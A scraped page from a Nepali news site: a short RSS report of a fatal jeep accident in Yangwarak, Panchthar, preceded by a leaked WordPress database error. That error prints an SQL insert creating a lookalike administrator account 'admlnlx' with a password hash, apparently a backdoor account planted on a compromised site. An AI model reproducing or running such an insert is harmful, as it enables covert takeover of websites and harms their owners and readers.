WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BcbCQGM5fomNvcsPtgEtQECAXUO3c..', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 22:18:44', '', 'admlnlx', 'admlnlx')
पाँचथर । पाँचथरको याङवरक गाउँपालिकामा आज जीप दुर्घटना हुँदा चालकको मृत्यु भएको छ ।
याङवरक गाउँपालिका– १, च्याङथापू जाँदै गरेको मे१ज ३५६ नं को जीप याङवरक–३ यलम्बर चोकमा दुर्घटना हुँदा सवारी चालक फिदिम नगरपालिका–२ पल्लोटारका ३५ वर्षीय फूलकुमार राईको मृत्यु भएको छ । जीप सडकबाट करीब २०० मिटर तल खसेको थियो । दुर्घटनामा घाइते चालक राईको उपचारका क्रममा जिल्ला अस्पताल फिदिममा मृत्यु भएको हो । दुर्घटनामा गम्भीर घाइते फिदिम–२ का २२ वर्षीय आशिष राईलाई उपचारका लागि झापा पठाएको प्रहरीले जनाएको छ । रासस